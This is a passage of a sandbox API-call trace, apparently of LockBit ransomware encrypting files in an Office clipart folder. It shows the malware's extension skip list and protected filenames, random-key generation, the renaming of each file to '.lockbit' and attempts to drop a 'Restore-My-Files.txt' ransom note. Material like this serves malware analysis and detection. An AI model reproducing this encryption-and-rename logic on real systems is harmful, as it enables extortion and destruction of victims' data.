[0183.613] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.613] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.613] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.613] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143749.GIF") returned 1 [0183.614] lstrcmpiW (lpString1="ntldr", lpString2="J0143749.GIF") returned 1 [0183.614] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143749.GIF") returned 1 [0183.614] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143749.GIF") returned -1 [0183.614] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143749.GIF") returned -1 [0183.614] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143749.GIF") returned 1 [0183.614] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143749.GIF") returned -1 [0183.614] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.614] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF") returned=".GIF" [0183.614] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.614] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.614] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.615] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.615] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.615] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.615] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.615] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.615] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF.lockbit") returned 85 [0183.615] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143749.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0183.617] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.617] malloc (_Size=0x40068) returned 0x3df0008 [0183.617] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4899) returned 1 [0183.617] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.618] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0183.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.618] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0183.618] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0183.620] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.620] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.620] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.622] free (_Block=0x1fa2ed8) [0183.622] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.622] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.622] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.622] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1896c00, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc1896c00, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x43e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143750.GIF", cAlternateFileName="")) returned 1 [0183.622] lstrcmpiW (lpString1=".", lpString2="J0143750.GIF") returned -1 [0183.622] lstrcmpiW (lpString1="..", lpString2="J0143750.GIF") returned -1 [0183.623] PathFindExtensionW (pszPath="J0143750.GIF") returned=".GIF" [0183.623] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.623] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.623] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.624] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.624] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.625] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.625] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.625] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.625] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.625] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.626] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143750.GIF") returned 1 [0183.626] lstrcmpiW (lpString1="ntldr", lpString2="J0143750.GIF") returned 1 [0183.626] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143750.GIF") returned 1 [0183.626] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143750.GIF") returned -1 [0183.626] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143750.GIF") returned -1 [0183.626] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143750.GIF") returned 1 [0183.626] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143750.GIF") returned -1 [0183.626] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.626] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF") returned=".GIF" [0183.626] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.626] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.626] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.626] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.627] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.627] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.627] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.627] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF.lockbit") returned 85 [0183.627] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143750.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0183.629] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.629] malloc (_Size=0x40068) returned 0x1ff1e60 [0183.629] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1086) returned 1 [0183.629] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0183.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0183.630] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0183.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.632] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.632] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.634] free (_Block=0x1fa2ed8) [0183.634] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.634] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.634] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9313100, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9313100, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x412, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143752.GIF", cAlternateFileName="")) returned 1 [0183.634] lstrcmpiW (lpString1=".", lpString2="J0143752.GIF") returned -1 [0183.635] lstrcmpiW (lpString1="..", lpString2="J0143752.GIF") returned -1 [0183.635] PathFindExtensionW (pszPath="J0143752.GIF") returned=".GIF" [0183.635] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.635] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.635] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.636] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.636] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.636] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.636] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.636] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.636] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.637] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.637] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.637] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143752.GIF") returned 1 [0183.637] lstrcmpiW (lpString1="ntldr", lpString2="J0143752.GIF") returned 1 [0183.637] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143752.GIF") returned 1 [0183.637] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143752.GIF") returned -1 [0183.637] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143752.GIF") returned -1 [0183.637] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143752.GIF") returned 1 [0183.637] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143752.GIF") returned -1 [0183.637] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.637] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF") returned=".GIF" [0183.637] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.637] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.637] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.637] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.638] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.638] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.638] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.638] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.638] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.638] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF.lockbit") returned 85 [0183.638] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143752.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0183.640] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.640] malloc (_Size=0x40068) returned 0x3d70450 [0183.640] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1042) returned 1 [0183.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0183.641] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0183.641] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, 